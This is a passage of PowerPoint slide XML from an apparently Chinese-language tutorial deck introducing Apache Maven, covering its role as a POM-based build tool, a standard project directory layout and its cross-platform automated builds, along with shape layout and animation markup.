            <p:cNvPr id="8" name="组合 7"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1024418" y="5599087"/>
              <a:ext cx="10248012" cy="1362490"/>
              <a:chOff x="1073475" y="5693357"/>
              <a:chExt cx="10198570" cy="1362490"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="9" name="三角形 9"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm rot="2651319">
                <a:off x="1103889" y="6012233"/>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1073475" y="5693357"/>
                <a:ext cx="10198570" cy="1362490"/>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097275" y="5728120"/>
                <a:ext cx="1053296" cy="3009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Maven</a:t>
                </a:r>
                <a:r>
                  <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                    <a:latin typeface="Alibaba PuHuiTi R" pitchFamily="18" charset="-122"/>
                    <a:ea typeface="Alibaba PuHuiTi R" pitchFamily="18" charset="-122"/>
                    <a:cs typeface="Alibaba PuHuiTi R" pitchFamily="18" charset="-122"/>
                  </a:rPr>
                  <a:t>作用</a:t>
                </a:r>
                <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                  <a:latin typeface="Alibaba PuHuiTi R" pitchFamily="18" charset="-122"/>
                  <a:ea typeface="Alibaba PuHuiTi R" pitchFamily="18" charset="-122"/>
                  <a:cs typeface="Alibaba PuHuiTi R" pitchFamily="18" charset="-122"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="12" name="组合 11"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="679077" y="1300804"/>
            <a:ext cx="10925205" cy="2066576"/>
            <a:chOff x="795582" y="1703810"/>
            <a:chExt cx="10925205" cy="2066576"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="13" name="组合 12"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="795582" y="1703810"/>
              <a:ext cx="10925205" cy="2066576"/>
              <a:chOff x="920208" y="1823315"/>
              <a:chExt cx="10713011" cy="2066576"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="15" name="矩形: 对角圆角 6"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="920208" y="1823316"/>
                <a:ext cx="10713011" cy="2066575"/>
              </a:xfrm>
              <a:prstGeom prst="round2DiagRect">
                <a:avLst>
                  <a:gd name="adj1" fmla="val 5462"/>
                  <a:gd name="adj2" fmla="val 2825"/>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04000" bIns="0" rtlCol="0" anchor="ctr"/>
              <a:lstStyle/>
              <a:p>
                <a:pPr marL="360045" lvl="1" indent="-285750">
                  <a:lnSpc>
                    <a:spcPct val="20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介绍：</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" altLang="zh-CN" sz="1400" b="0" i="0" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1">
                        <a:lumMod val="65000"/>
                        <a:lumOff val="35000"/>
                      </a:schemeClr>
                    </a:solidFill>
                    <a:effectLst/>
                  </a:rPr>
                  <a:t> Apache Maven </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" sz="1400" b="0" i="0" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="4D4D4D"/>
                    </a:solidFill>
                    <a:effectLst/>
                  </a:rPr>
                  <a:t>是一个项目管理</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="4D4D4D"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>和构建</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" sz="1400" b="0" i="0" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1">
                        <a:lumMod val="65000"/>
                        <a:lumOff val="35000"/>
                      </a:schemeClr>
                    </a:solidFill>
                    <a:effectLst/>
                  </a:rPr>
                  <a:t>工具</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" sz="1400" b="0" i="0" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="4D4D4D"/>
                    </a:solidFill>
                    <a:effectLst/>
                  </a:rPr>
                  <a:t>，它基于项目对象模型</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" altLang="zh-CN" sz="1400" b="0" i="0" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="4D4D4D"/>
                    </a:solidFill>
                    <a:effectLst/>
                  </a:rPr>
                  <a:t>(POM)</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" sz="1400" b="0" i="0" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="4D4D4D"/>
                    </a:solidFill>
                    <a:effectLst/>
                  </a:rPr>
                  <a:t>的概念，通过一小段描述信息来管理项目的构建</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lvl="1" indent="-285750">
                  <a:lnSpc>
                    <a:spcPct val="20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官网：</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1"/>
                    </a:solidFill>
                    <a:latin typeface="+mj-ea"/>
                    <a:ea typeface="+mj-ea"/>
                    <a:hlinkClick r:id="rId2"/>
                  </a:rPr>
                  <a:t> https://maven.apache.org/</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矩形: 对角圆角 7"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="920212" y="1823315"/>
                <a:ext cx="1171378" cy="431493"/>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Maven</a:t>
                </a:r>
                <a:endPar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4" name="Shape 2621"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="942075" y="1779826"/>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gr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9" name="组合 8"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="231606" y="1326141"/>
            <a:ext cx="11000633" cy="1362490"/>
            <a:chOff x="1024418" y="5599087"/>
            <a:chExt cx="10401146" cy="1362490"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="TextBox 6"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1496828" y="5969292"/>
              <a:ext cx="9928736" cy="337721"/>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Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                <a:buChar char="l"/>
              </a:pPr>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Alibaba PuHuiTi R" pitchFamily="18" charset="-122"/>
                  <a:ea typeface="Alibaba PuHuiTi R" pitchFamily="18" charset="-122"/>
                  <a:cs typeface="Alibaba PuHuiTi R" pitchFamily="18" charset="-122"/>
                </a:rPr>
                <a:t>统一项目结构。</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="00B0F0"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>提供标准、统一的项目结构</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="11" name="组合 10"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1024418" y="5599087"/>
              <a:ext cx="10248012" cy="1362490"/>
              <a:chOff x="1073475" y="5693357"/>
              <a:chExt cx="10198570" cy="1362490"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="12" name="三角形 9"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm rot="2651319">
                <a:off x="1103889" y="6012233"/>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073475" y="5693357"/>
                <a:ext cx="10198570" cy="1362490"/>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097275" y="5728120"/>
                <a:ext cx="1053296" cy="3009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Maven</a:t>
                </a:r>
                <a:r>
                  <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                    <a:latin typeface="Alibaba PuHuiTi R" pitchFamily="18" charset="-122"/>
                    <a:ea typeface="Alibaba PuHuiTi R" pitchFamily="18" charset="-122"/>
                    <a:cs typeface="Alibaba PuHuiTi R" pitchFamily="18" charset="-122"/>
                  </a:rPr>
                  <a:t>作用</a:t>
                </a:r>
                <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                  <a:latin typeface="Alibaba PuHuiTi R" pitchFamily="18" charset="-122"/>
                  <a:ea typeface="Alibaba PuHuiTi R" pitchFamily="18" charset="-122"/>
                  <a:cs typeface="Alibaba PuHuiTi R" pitchFamily="18" charset="-122"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
      </p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="16" name="图片 15"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId1"/>
          <a:srcRect r="7760"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="256900" y="2914550"/>
            <a:ext cx="2150070" cy="2877871"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 5428"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="6350">
            <a:solidFill>
              <a:schemeClr val="bg1">
                <a:lumMod val="65000"/>
              </a:schemeClr>
            </a:solidFill>
            <a:prstDash val="dash"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="17" name="组合 16"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1851598" y="3612443"/>
            <a:ext cx="2150070" cy="276999"/>
            <a:chOff x="8580120" y="2984013"/>
            <a:chExt cx="2150070" cy="276999"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="18" name="组合 17"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="8580120" y="3062769"/>
              <a:ext cx="909320" cy="96405"/>
              <a:chOff x="9662160" y="3628651"/>
              <a:chExt cx="909320" cy="96405"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="20" name="流程图: 接点 44"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="9662160" y="3628651"/>
                <a:ext cx="91440" cy="9640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45"/>
              <p:cNvCxnSpPr/>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="9753600" y="3676853"/>
                <a:ext cx="8178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9568180" y="2984013"/>
              <a:ext cx="1162010" cy="276999"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">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实际项目资源</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US"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22" name="组合 21"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1851598" y="4555107"/>
            <a:ext cx="2145355" cy="276999"/>
            <a:chOff x="8580120" y="3926677"/>
            <a:chExt cx="2145355" cy="276999"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="23" name="组合 22"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="8580120" y="4016975"/>
              <a:ext cx="909320" cy="96405"/>
              <a:chOff x="9662160" y="3628651"/>
              <a:chExt cx="909320" cy="96405"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="25" name="流程图: 接点 49"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="9662160" y="3628651"/>
                <a:ext cx="91440" cy="9640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50"/>
              <p:cNvCxnSpPr/>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="9753600" y="3676853"/>
                <a:ext cx="8178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9563465" y="3926677"/>
              <a:ext cx="1162010" cy="276999"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">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测试项目资源</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US"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28" name="组合 27"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1851598" y="5463615"/>
            <a:ext cx="2145355" cy="276999"/>
            <a:chOff x="8580120" y="4835185"/>
            <a:chExt cx="2145355" cy="276999"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="29" name="组合 28"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="8580120" y="4909994"/>
              <a:ext cx="909320" cy="96405"/>
              <a:chOff x="9662160" y="3628651"/>
              <a:chExt cx="909320" cy="96405"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="31" name="流程图: 接点 54"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="9662160" y="3628651"/>
                <a:ext cx="91440" cy="9640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55"/>
              <p:cNvCxnSpPr/>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="9753600" y="3676853"/>
                <a:ext cx="8178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9563465" y="4835185"/>
              <a:ext cx="1162010" cy="276999"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">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项目配置文件</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US"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3" name="组合 32"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2023430" y="3903925"/>
            <a:ext cx="2085864" cy="276999"/>
            <a:chOff x="8751952" y="3275495"/>
            <a:chExt cx="2085864" cy="276999"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="34" name="组合 33"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="8751952" y="3368370"/>
              <a:ext cx="737488" cy="96405"/>
              <a:chOff x="9662160" y="3628651"/>
              <a:chExt cx="737488" cy="96405"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36" name="流程图: 接点 59"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="9662160" y="3628651"/>
                <a:ext cx="91440" cy="9640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60"/>
              <p:cNvCxnSpPr/>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="9753600" y="3676853"/>
                <a:ext cx="64604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9580880" y="3275495"/>
              <a:ext cx="1256936" cy="276999"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr fontAlgn="auto">
                <a:spcBef>
                  <a:spcPts val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="12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a:t>
              </a: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源代码目录</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US"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8" name="组合 37"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2328230" y="4214985"/>
            <a:ext cx="1763649" cy="276999"/>
            <a:chOff x="9056752" y="3586555"/>
            <a:chExt cx="1763649" cy="276999"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="39" name="组合 38"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="9056752" y="3690366"/>
              <a:ext cx="432688" cy="96405"/>
              <a:chOff x="9662160" y="3628651"/>
              <a:chExt cx="432688" cy="96405"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="41" name="流程图: 接点 75"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="9662160" y="3628651"/>
                <a:ext cx="91440" cy="9640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76"/>
              <p:cNvCxnSpPr/>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="9753600" y="3676853"/>
                <a:ext cx="34124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9563465" y="3586555"/>
              <a:ext cx="1256936" cy="276999"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr fontAlgn="auto">
                <a:spcBef>
                  <a:spcPts val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="12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配置文件目录</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US"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43" name="矩形: 圆角 77"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="647052" y="3559753"/>
            <a:ext cx="4041726" cy="942664"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 11071"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0AECA6">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78"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="647052" y="4556599"/>
            <a:ext cx="4041726" cy="907015"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 11071"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFC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p:tgtEl>
                                          <p:spTgt spid="17"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x-#ppt_w*1.125000"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect transition="in" filter="wipe(right)">
                                      <p:cBhvr>
                                        <p:cTn id="13" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="17"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="14" presetID="12" presetClass="entr" presetSubtype="8"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p:tgtEl>
                                          <p:spTgt spid="33"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x-#ppt_w*1.125000"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect transition="in" filter="wipe(right)">
                                      <p:cBhvr>
                                        <p:cTn id="17" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="33"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="18" presetID="12" presetClass="entr" presetSubtype="8"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p:tgtEl>
                                          <p:spTgt spid="38"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x-#ppt_w*1.125000"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect transition="in" filter="wipe(right)">
                                      <p:cBhvr>
                                        <p:cTn id="21" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="38"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="22" presetID="12" presetClass="entr" presetSubtype="8"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p:tgtEl>
                                          <p:spTgt spid="22"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x-#ppt_w*1.125000"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect transition="in" filter="wipe(right)">
                                      <p:cBhvr>
                                        <p:cTn id="25" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="22"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="26" presetID="12" presetClass="entr" presetSubtype="8"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p:tgtEl>
                                          <p:spTgt spid="28"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x-#ppt_w*1.125000"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect transition="in" filter="wipe(right)">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additive="base">
                                        <p:cTn id="34" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="43"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x-#ppt_w*1.125000"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect transition="in" filter="wipe(right)">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p:tgtEl>
                                          <p:spTgt spid="44"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x-#ppt_w*1.125000"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect transition="in" filter="wipe(right)">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2" name="组合 1"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="231606" y="1326141"/>
            <a:ext cx="11000633" cy="1362490"/>
            <a:chOff x="1024418" y="5599087"/>
            <a:chExt cx="10401146" cy="1362490"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="TextBox 6"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1496828" y="5969292"/>
              <a:ext cx="9928736" cy="337721"/>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Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                <a:buChar char="l"/>
              </a:pPr>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="1" dirty="0"/>
                <a:t>项目构建。</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="00B0F0"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>标准跨平台（</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="00B0F0"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Linux</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="00B0F0"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>、</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="00B0F0"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Windows</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="00B0F0"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>、</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="00B0F0"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>MacOS</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="00B0F0"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>）的自动化项目构建方式</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="4" name="组合 3"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1024418" y="5599087"/>
              <a:ext cx="10248012" cy="1362490"/>
              <a:chOff x="1073475" y="5693357"/>
              <a:chExt cx="10198570" cy="1362490"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="5" name="三角形 9"/>
              <p:cNvSpPr/>
